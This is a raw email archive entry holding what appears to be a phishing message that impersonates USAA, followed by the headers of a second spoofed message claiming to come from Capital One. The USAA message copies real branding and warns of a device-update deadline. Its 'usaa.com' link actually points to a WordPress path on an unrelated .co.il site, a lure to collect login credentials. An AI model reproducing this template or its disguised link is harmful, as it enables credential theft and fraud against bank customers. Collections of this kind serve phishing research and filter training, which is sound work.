From: "USAA" <DUIFHFINBC16@amedd.army.mil>
Date: Wed, 30 Dec 2015 18:11:23 -0500
Return-Path: DUIFHFINBC16@amedd.army.mil
Message-ID: <BMSRDPjnzi95HfqR77b000004fa@BMSRDP.sullivaninsurance.com>
X-OriginalArrivalTime: 30 Dec 2015 23:11:23.0761 (UTC) FILETIME=[66DFBE10:01D14357]
Status: O
X-Status: 
X-Keywords:                  
X-UID: 306

You will not see this in a MIME-aware mail reader.
--===============0854198066==
Content-Type: text/plain; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

 =

To ensure delivery to your inbox, please add USAA.Customer.Service@mailcent=
er.usaa.com to your address book. 	 =

 	  =

	 =

	  =

Security Upgrade May Affect usaa.com Access	 =

View Accounts | Privacy Promise | Contact Us	 =

	  =

 =

	 	 =

	 	 =

	 	 =

	  =

USAA SECURITY ZONE =

USAA =

Member =

USAA # 	 =

	  =

	 =

	 =

	 =

	 =

 	 =

 	 =

  @page Section1:first { size:8.5in 11.0in; margin-top:0.75in; margin-right=
:0.75in; margin-bottom:0.75in; margin-left:0.75in } #messagebody div.rcmBod=
y div.Section1 { page:"Section1" } #messagebody div.rcmBody p.normal { font=
-family:"Verdana"; font-size:10.0pt; font-variant:normal; text-align:left; =
text-transform:none; margin-top:0.0pt; margin-right:0.0pt; margin-bottom:0.=
0pt; margin-left:0.0pt } #messagebody div.rcmBody table.normal { font-famil=
y:"Times New Roman"; font-size:10.0pt; font-variant:normal; text-align:left=
; text-transform:none; margin-top:0.0pt; margin-right:0.0pt; margin-bottom:=
0.0pt; margin-left:0.0pt; border-collapse:collapse }      =

 Dear Valued Member, =

    =

 We recently let you know that we are participating in a worldwide Internet=
 upgrade to increase online security for you and USAA. Access to usaa.com f=
or members who use devices with old operating systems may be affected by th=
is Internet upgrade. To update your account now, Log on to usaa.com. =

    =

  Device Update Deadline  =

 This is a final reminder that you'll need to check your device operating s=
ystem and update it if necessary by Dec 31, 2015. After this date, devices =
without an updated system will not be able to access usaa.com. =

    =

 If you need help updating your device, please contact your mobile service =
provider or computer retailer. If you have questions, please call us at 1-8=
77-632-3002 and say "technical support" when prompted. =

    =

 Thank you,  =

 USAA  =

    =

    =

 =

    =

 	    =

 =

   =

 USAA, 9800 Fredericksburg Road, San Antonio, Texas 7828 8 =

    =

 =

 	 =

	  	 =

 =

Privacy Promise

 Please do not reply to this e-mail. To contact USAA, visit our secure cont=
act page.
	 =

129209-0215

	  	=20
--===============0854198066==
Content-Type: text/html; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

<div align=3D"center">
<table bgcolor=3D"#b5d7e6" border=3D"0" cellpadding=3D"0" cellspacing=3D"0"=
 width=3D"650"><tbody><tr><td =


align=3D"center" background=3D"https://content.usaa.com/mcontent/static_ass=
ets/Media/email_emailbar_bg.gif" =


height=3D"35" valign=3D"middle" width=3D"650"><font style=3D"color: #929292=
; font-size: 9px" face=3D"Verdana, =


sans-serif">To
            ensure delivery to your inbox, please add <span style=3D"color: =


#68A7C5">USAA.Customer.Service@mailcenter.usaa.com</span>
            to your address book.</font>
            </td><td>
      </td></tr></tbody></table><table bgcolor=3D"#b5d7e6" border=3D"0" cel=
lpadding=3D"0" cellspacing=3D"0" =


width=3D"650"><tbody><tr><td width=3D"10">&nbsp;</td>
            <td align=3D"left" bgcolor=3D"white">
            <table border=3D"0" cellpadding=3D"0" cellspacing=3D"0" width=
=3D"98%"><tbody><tr><td colspan=3D"4" =


height=3D"5"></td>
                  </tr><tr><td height=3D"45" width=3D"54"><a =


href=3D"https://www.usaa.com/inet/ent_logon/Logon?EID=3D129209-0215_head" t=
arget=3D"_blank" =


rel=3D"noreferrer"><img src=3D"https://content.usaa.com/mcontent/static_ass=
ets/Media/email_logo.gif" alt=3D"" =


border=3D"0" height=3D"41" width=3D"61"></a></td>
                        <td>
                        <table border=3D"0" cellpadding=3D"0" cellspacing=
=3D"0"><tbody><tr><td style=3D"font: =


bold 16px Arial, sans-serif; color: #6d6d6d" align=3D"left" height=3D"22"><=
span style=3D"display: block; =


margin-top: 9px">Security Upgrade May Affect usaa.com Access</span></td>
                              </tr><tr><td align=3D"left" height=3D"23" now=
rap=3D"nowrap"><nobr><font =


face=3D"Verdana, sans-serif" size=3D"1"><a href=3D"https://www.usaa.com/ine=
t/ent_home/CpHome?EID=3D129209-

0215_head" style=3D"color: #6d6d6d; text-decoration: none" target=3D"_blank=
" rel=3D"noreferrer">View =


Accounts</a> | <a href=3D"https://www.usaa.com/inet/ent_utils/McStaticPages?

key=3Dprivacy_promise&amp;EID=3D129209-0215_head" style=3D"color: #6d6d6d; =
text-decoration: none" =


target=3D"_blank" rel=3D"noreferrer">Privacy Promise</a> | <a =


href=3D"https://www.usaa.com/inet/ent_contactus/CpLevelZeroContactUs?

ContactUsPageId=3DPublicContactUs&amp;EID=3D129209-0215_head" style=3D"colo=
r: #6d6d6d; text-decoration: none" =


target=3D"_blank" rel=3D"noreferrer">Contact Us</a></font></nobr></td>
                              </tr></tbody></table></td>
                        <td align=3D"right" height=3D"45" valign=3D"middle"=
 width=3D"367"><!-- node type 8 -->
                        =

                        <table border=3D"0" cellpadding=3D"0" cellspacing=
=3D"0" height=3D"65" =


width=3D"188"><tbody><tr><td width=3D"22">
                                    <table border=3D"0" cellpadding=3D"0" c=
ellspacing=3D"0" height=3D"65" =


width=3D"22"><tbody><tr><td style=3D"line-height: 0px" height=3D"29" valign=
=3D"top" width=3D"8"><img =


src=3D"https://content.usaa.com/mcontent/static_assets/Media/email_sec_1-1.=
gif" alt=3D"" style=3D"display: =


block" border=3D"0" height=3D"29" width=3D"8"></td>
                                                <td style=3D"line-height: 0=
px" bgcolor=3D"#e7e7e8" =


height=3D"29" valign=3D"top" width=3D"14"><img =


src=3D"https://content.usaa.com/mcontent/static_assets/Media/email_sec_1-2.=
gif" alt=3D"" style=3D"display: =


block" border=3D"0" height=3D"29" width=3D"14"></td>
                                          </tr><tr><td style=3D"line-height=
: 0px" height=3D"29" valign=3D"top" =


width=3D"8"><img src=3D"https://content.usaa.com/mcontent/static_assets/Med=
ia/email_sec_spacer.gif" alt=3D"" =


style=3D"display: block" border=3D"0" height=3D"29" width=3D"8"></td>
                                                <td style=3D"line-height: 0=
px" bgcolor=3D"#e7e7e8" =


height=3D"29" valign=3D"top" width=3D"14"><img =


src=3D"https://content.usaa.com/mcontent/static_assets/Media/email_sec_spac=
er.gif" alt=3D"" style=3D"display: =


block" border=3D"0" height=3D"29" width=3D"14"></td>
                                          </tr><tr><td style=3D"line-height=
: 0px" height=3D"7" =


valign=3D"bottom" width=3D"8"></td>
                                                <td style=3D"line-height: 0=
px" bgcolor=3D"#e7e7e8" height=3D"7" =


valign=3D"bottom" width=3D"14"><img src=3D"https://content.usaa.com/mconten=
t/static_assets/Media/email_sec_2-

1.gif" alt=3D"" style=3D"display: block" border=3D"0" height=3D"7" width=3D=
"14"></td>
                                          </tr></tbody></table></td>
                                    <td align=3D"left" bgcolor=3D"#e7e7e8">
                                    <table border=3D"0" cellpadding=3D"5" c=
ellspacing=3D"0" height=3D"65" =


width=3D"100%"><tbody><tr><td style=3D"text-align: left; font-size: 9px; li=
ne-height: 12px; -webkit-text-

size-adjust: none" align=3D"left" valign=3D"middle"><font style=3D"font-siz=
e: 10px; color: #00365b" =


face=3D"Arial, Helvetica, sans-serif"><strong>USAA
                                                SECURITY ZONE</strong></fon=
t> <br><font style=3D"font-size: =


9px; color: #00365b" face=3D"Arial, Helvetica, sans-serif">USAA</font>
                                                <br><font style=3D"font-siz=
e: 9px; color: #00365b" =


face=3D"Arial, Helvetica, sans-serif">Member</font>
                                                <br><font style=3D"font-siz=
e: 9px; color: #00365b" =


face=3D"Arial, Helvetica, sans-serif">USAA # </font></td>
                                          </tr></tbody></table></td>
                                    <td bgcolor=3D"#ffffff" width=3D"7">
                                    <table border=3D"0" cellpadding=3D"0" c=
ellspacing=3D"0" height=3D"65" =


width=3D"7"><tbody><tr><td style=3D"line-height: 0px" align=3D"right" bgcol=
or=3D"#e7e7e8" height=3D"7" valign=3D"top" =


width=3D"7"><img src=3D"https://content.usaa.com/mcontent/static_assets/Med=
ia/email_sec_1-3.gif" alt=3D"" =


style=3D"display: block" border=3D"0" height=3D"7" width=3D"7"></td>
                                          </tr><tr><td style=3D"line-height=
: 0px" align=3D"right" =


bgcolor=3D"#e7e7e8" height=3D"51" valign=3D"top" width=3D"7"><img =


src=3D"https://content.usaa.com/mcontent/static_assets/Media/email_sec_spac=
er.gif" alt=3D"" style=3D"display: =


block" border=3D"0" height=3D"51" width=3D"7"></td>
                                          </tr><tr><td style=3D"line-height=
: 0px" align=3D"right" =


bgcolor=3D"#e7e7e8" height=3D"7" valign=3D"bottom" width=3D"7"><img =


src=3D"https://content.usaa.com/mcontent/static_assets/Media/email_sec_2-2.=
gif" alt=3D"" style=3D"display: =


block" border=3D"0" height=3D"7" width=3D"7"></td>
                                          </tr></tbody></table></td>
                              </tr></tbody></table><!-- node type 8 --></td=
></tr><tr><td colspan=3D"4" =


height=3D"20">&nbsp;</td>
                  </tr><tr><td colspan=3D"4" height=3D"1">&nbsp;</td>
                  </tr></tbody></table><table border=3D"0" cellpadding=3D"0=
" cellspacing=3D"0" =


width=3D"100%"><tbody><tr><td align=3D"left"><font style=3D"color: #333333;=
 font-size: 12px; line-height: 18px" =


face=3D"Verdana, sans-serif">
                        <style type=3D"text/css">

@page Section1:first {
	size:8.5in 11.0in;
	margin-top:0.75in;
	margin-right:0.75in;
	margin-bottom:0.75in;
	margin-left:0.75in
}
#messagebody div.rcmBody div.Section1 {
	page:"Section1"
}

#messagebody div.rcmBody p.normal {
	font-family:"Verdana";
	font-size:10.0pt;
	font-variant:normal;
	text-align:left;
	text-transform:none;
	margin-top:0.0pt;
	margin-right:0.0pt;
	margin-bottom:0.0pt;
	margin-left:0.0pt
}
#messagebody div.rcmBody table.normal {
	font-family:"Times New Roman";
	font-size:10.0pt;
	font-variant:normal;
	text-align:left;
	text-transform:none;
	margin-top:0.0pt;
	margin-right:0.0pt;
	margin-bottom:0.0pt;
	margin-left:0.0pt;
	border-collapse:collapse
}
</style>
<div class=3D"Section1"><div style=3D"margin-left: 1em; margin-right: 1em">
            <p class=3D"normal" style=3D"font-style: normal; margin-bottom:=
 0.0pt"><span>
</span><span>&nbsp;</span>
            </p>
            <p class=3D"normal" style=3D"font-style: normal; margin-bottom:=
 0.0pt"><span class=3D"DLSVAR" =


style=3D"margin-bottom: 0.0pt">Dear&nbsp;Valued&nbsp;Member,</span>
            </p>
            <p class=3D"normal" style=3D"font-style: normal; margin-bottom:=
 0.0pt"><span>
</span><span>&nbsp;</span>
            </p>
            <p class=3D"normal" style=3D"font-style: normal; margin-bottom:=
 0.0pt">We
                recently let you know that we are participating in a
                worldwide Internet upgrade to increase online security
                for you and USAA. Access to usaa.com for members who use
                devices with old operating systems may be affected by
                this Internet upgrade. To update your account now, Log on
                to <a =


href=3D"http://partybreak.co.il/magazin/wp-content/themes/olympia/slide6_a.=
htm"style=3D"color: blue; text-align: =


left; text-transform: none; text-decoration: underline; text-underline: sol=
id" target=3D"_blank" =


rel=3D"noreferrer">usaa.com</a>. </p>
            <p class=3D"normal" style=3D"font-style: normal; margin-bottom:=
 0.0pt"><span>
</span><span>&nbsp;</span>
            </p>
            <p class=3D"normal" style=3D"font-style: normal; margin-bottom:=
 0.0pt">
                <b>Device Update Deadline<span></span></b><span style=3D"fo=
nt-weight: bold">
</span>
            </p>
            <p class=3D"normal" style=3D"font-style: normal; margin-bottom:=
 0.0pt">This is a
                final reminder that you'll need to check your device
                operating system and update it if necessary by Dec 31,
                2015. <b>After this date, devices without an updated
                    system will not be able to access usaa.com.</b> </p>
            <p class=3D"normal" style=3D"font-style: normal; margin-bottom:=
 0.0pt"><span>
</span><span>&nbsp;</span>
            </p>
            <p class=3D"normal" style=3D"font-style: normal; margin-bottom:=
 0.0pt">If you
                need help updating your device, please contact your
                mobile service provider or computer retailer. If you
                have questions, please call us at 1-877-632-3002 and say
                "technical support" when prompted. </p>
            <p class=3D"normal" style=3D"font-style: normal; margin-bottom:=
 0.0pt"><span>
</span><span>&nbsp;</span>
            </p>
            <p class=3D"normal" style=3D"font-style: normal; margin-bottom:=
 0.0pt; page-break-before: =


auto"><span>Thank you,<span></span></span><span>
</span>
            </p>
            <p class=3D"normal" style=3D"font-style: normal; margin-bottom:=
 0.0pt; page-break-before: =


auto"><span>USAA<span></span></span><span>
</span>
            </p>
            <p class=3D"normal" style=3D"font-style: normal; margin-bottom:=
 0.0pt; page-break-before: =


auto"><span style=3D"color: #000000; font-size: 8.0pt"><span>
</span></span><span style=3D"color: #000000; font-size: 8.0pt">&nbsp;</span>
            </p>
            <p class=3D"normal" style=3D"font-style: normal; margin-bottom:=
 0.0pt"><span>
</span><span>&nbsp;</span>
            </p>
            <table class=3D"normal" style=3D"font-style: normal"><tbody><tr=
 style=3D"height: 0.35in"><td =


style=3D"padding-top: 0.0in; padding-right: 0.0in; padding-bottom: 0.0in; p=
adding-left: 0.0in; width: =


27.9pt; height: 0.35in; border: none" valign=3D"top"><p class=3D"normal" st=
yle=3D"font-style: normal; margin-

bottom: 0.0pt"><span style=3D"display: none"></span> <a href=3D"http://www.=
facebook.com/USAA" target=3D"_blank" =


rel=3D"noreferrer"><img alt=3D"" =


src=3D"http://content.usaa.com/mcontent/static_assets/om/Media/facebookIcon=
.gif" border=3D"0" height=3D"29" =


width=3D"29"></a> <a href=3D"http://www.facebook.com/USAA" style=3D"color: =
blue; text-align: left; text-

transform: none; text-decoration: underline; text-underline: solid" target=
=3D"_blank" =


rel=3D"noreferrer"><span style=3D"color: #000000"><span></span></span>
                            </a> </p>
                    </td><td style=3D"padding-top: 0.0in; padding-right: 0.=
0in; padding-bottom: 0.0in; =


padding-left: 0.0in; width: 30.6pt; height: 0.35in; border: none" valign=3D=
"top"><p class=3D"normal" =


style=3D"font-style: normal; margin-bottom: 0.0pt"><span style=3D"display: =
none"></span> <a =


href=3D"http://twitter.com/usaa" target=3D"_blank" rel=3D"noreferrer"><img =
alt=3D"" =


src=3D"http://content.usaa.com/mcontent/static_assets/om/Media/twitterIcon.=
gif" border=3D"0" height=3D"29" =


width=3D"29"></a> <a href=3D"http://twitter.com/usaa" style=3D"color: blue;=
 text-align: left; text-transform: =


none; text-decoration: underline; text-underline: solid" target=3D"_blank" =
rel=3D"noreferrer"><span =


style=3D"color: #000000"><span></span></span>
                            </a> </p>
                    </td></tr></tbody></table></div><table class=3D"normal"=
 style=3D"background: #b5d7e6; =


font-style: normal"><tbody><tr><td style=3D"padding-top: 0.0in; padding-rig=
ht: 5.4pt; padding-bottom: =


0.0in; padding-left: 5.4pt; width: 7.15in; border: none" valign=3D"top"><p =
class=3D"normal" style=3D"font-

style: normal; text-align: center; margin-bottom: 0.0pt; tab-stops: 58.9pt"=
><span style=3D"color: #6d6d6d; =


font-size: 7.5pt"><span style=3D"text-align: left"> </span><span></span></s=
pan><span style=3D"color: #6d6d6d; =


font-size: 7.5pt">
</span>
                        </p>
                        <p class=3D"normal" style=3D"font-style: normal; te=
xt-align: center; margin-bottom: =


0.0pt; tab-stops: 58.9pt"><span style=3D"color: #6d6d6d; font-size: 7.5pt">=
<span =


class=3D"DLSVAR">USAA,&nbsp;9800&nbsp;Fredericksburg&nbsp;Road,&nbsp;San&nb=
sp;Antonio,&nbsp;Texas&nbsp;7828

8</span></span><span style=3D"color: #6d6d6d; font-size: 7.5pt"><span></spa=
n></span>
                        </p>
                        <p class=3D"normal" style=3D"font-style: normal; ma=
rgin-bottom: 0.0pt; page-break-

before: auto"><span style=3D"color: red; font-size: 8.0pt"><span>
</span></span><span style=3D"color: red; font-size: 8.0pt">&nbsp;</span>
                        </p>
                    </td></tr></tbody></table></div>
    </font></td>
                  </tr></tbody></table></td>
            <td width=3D"10">&nbsp;</td>
      </tr><!-- node type 8 --><tr bgcolor=3D"#b5d7e6"><td colspan=3D"2" al=
ign=3D"center"><font style=3D"color: =


#6d6d6d; font-size: 10px; line-height: 18px" face=3D"Verdana, sans-serif">
          <br><a href=3D"https://www.usaa.com/inet/pages/privacy_promise?EI=
D=3D129209-0215_foot" =


target=3D"_blank" rel=3D"noreferrer">Privacy Promise</a><br><br>

          =

Please do not reply to this e-mail. To contact USAA, visit our secure <a =


href=3D"https://www.usaa.com/inet/ent_references/CpSendUsAMessage?ContentAr=
ea=3Dcp&amp;EID=3D129209-0215_foot" =


target=3D"_blank" rel=3D"noreferrer">contact page</a>.<br></font></td>
     </tr><tr bgcolor=3D"#b5d7e6"><td colspan=3D"2" align=3D"right"><font s=
tyle=3D"color: #6d6d6d; font-size: =


10px; line-height: 18px" face=3D"Verdana, sans-serif">129209-0215</font><br=
><br></td>
            <td>&nbsp;</td>
      </tr></tbody></table></div>
--===============0854198066==--

From jose@monkey.org Thu Dec 31 09:16:42 2015 +0000
Return-Path: customerrelationshipalert@capitalone.com
Delivered-To: jose@monkey.org
X-FDA: 71023204644.17.pigs56_3a9235e7afa1d
Authentication-Results: auth.b.hostedemail.com; dkim=none
	reason="no signature"; dkim-adsp=none (insecure policy);
	dkim-atps=neutral
X-Spam-Summary: 34,2.2,0,00620062158eac50,d41d8cd98f00b204,customerrelationshipalert@capitalone.com,,RULES_HIT:2:41:152:355:379:387:539:540:541:542:543:567:677:704:871:962:967:973:988:989:1000:1155:1189:1260:1263:1308:1309:1313:1314:1345:1381:1432:1433:1434:1436:1437:1516:1517:1518:1567:1571:1575:1587:1588:1589:1592:1594:1685:1714:1730:1764:1777:1792:1803:1823:2073:2076:2107:2198:2199:2525:2539:2568:2682:2685:2859:2890:2895:2915:2926:2933:2937:2939:2942:2945:2947:2951:2954:3022:3138:3139:3140:3141:3142:3362:3586:3619:3623:3863:3865:3867:3873:3874:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:4042:4049:4321:4362:4365:4605:5007:6117:6119:6238:6261:6354:6506:6678:6747:6748:7212:7281:7398:7801:7809:7903:8516:8603:9025:9080:9121:9388:9898:10008:10049:10214:10265:10394:11026:11233:11473:11537:11604:11657:11658:11850:11914:12043:12219:12438:12555:13005:13017:13018:13019:13139:13374:14659:21212:21324:30001:30003:30006:30007:30009:30012:30016:30019:30022:30028:30034:30037:30041:30052:3005
X-HE-Tag: pigs56_3a9235e7afa1d
X-Filterd-Recvd-Size: 104714
Received: from omr2.cc.vt.edu (outbound.smtp.vt.edu [198.82.183.121])
	by imf02.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Thu, 31 Dec 2015 09:16:42 +0000 (UTC)
Received: from mr5.cc.vt.edu (mr5.cc.ipv6.vt.edu [IPv6:2001:468:c80:2105:0:2b8:b328:9234])
	by omr2.cc.vt.edu (8.14.4/8.14.4) with ESMTP id tBV96wQZ010484;
	Thu, 31 Dec 2015 04:06:58 -0500
Received: from Unknown (h80ad7345.dhcp.vt.edu [128.173.115.69])
	by mr5.cc.vt.edu (8.14.4/8.14.4) with SMTP id tBV96cjl028162;
	Thu, 31 Dec 2015 04:06:44 -0500
Message-ID: <4EC9A531E391424B965FA0CB2CF38F60@prwgg>
